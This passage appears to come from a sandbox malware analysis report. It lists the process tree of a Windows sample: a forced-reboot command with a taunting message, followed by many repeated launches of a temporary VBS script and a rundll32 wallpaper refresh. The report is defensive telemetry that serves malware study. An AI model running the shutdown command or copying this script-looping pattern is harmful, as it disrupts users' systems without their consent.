    - System Location Discovery: System Language Discovery
    PID:536
- - C:\Windows\SysWOW64\shutdown.exe
    shutdown /r /t 66 /c "ENJOY LIFE IN HELL!!!"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1808
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2256
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:5040
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2428
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:3172
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4868
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:1208
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:3240
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:4244
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2400
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2056
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2500
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:4332
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:2400
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:1380
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:5140
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:5148
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5200
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:5212
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:5248
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:5256
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:5340
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:5348
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:5392
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:5400
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:5440
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:5460
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:5504
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:5516
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5568
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5580
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:5620
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:5628
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:5668
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:5676
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:5732
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5744
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:5776
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:5788
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:5832
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:5840
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5876
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:5884
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5928
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:5944
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:5980
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6000
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:6028
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6076
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:6112
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6128
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:1380
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:5168
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:5280
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:5292
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:5320
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:5352
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:3880
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:5464
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:5528
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:5476
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:5592
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5636
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5692
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2492
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:5788
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:5860
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:5944
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6004
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:6044
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6052
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:5708
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:5988
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5164
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:5168
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:4764
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:908
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:2140
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2644
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5388
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2136
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5476
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:5628
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:5856
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5884
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:6080
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6140
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:4448
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:908
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2000
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:4364
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:3248
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:752
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:5260
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:3756
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:5760
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:4364
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:2936
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3756
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:444
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6148
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:6176
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6188
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:6220
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6232
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:6264
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6272
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:6308
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6316
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:6352
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6376
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:6404
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6420
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6448
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6468
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:6492
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6508
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:6536
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6548
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:6580
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6588
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6624
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6640
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6688
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6704
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:6732
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6748
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:6776
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6792
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:6856
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6868
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:6900
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6908
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:6944
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6956
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6988
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6996
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:7032
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7040
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:7076
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:7092
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:7120
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7128
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:7164
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6160
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6236
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6288
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:6368
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6376
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6472
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6512
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:6548
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6608
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:6672
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6684
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6748
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6832
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:6804
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6884
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6960
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7016
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7040
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:7160
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:6200
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6272
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:6552
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6512
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:6796
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6880
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:7016
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6244
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6708
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6920
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:1036
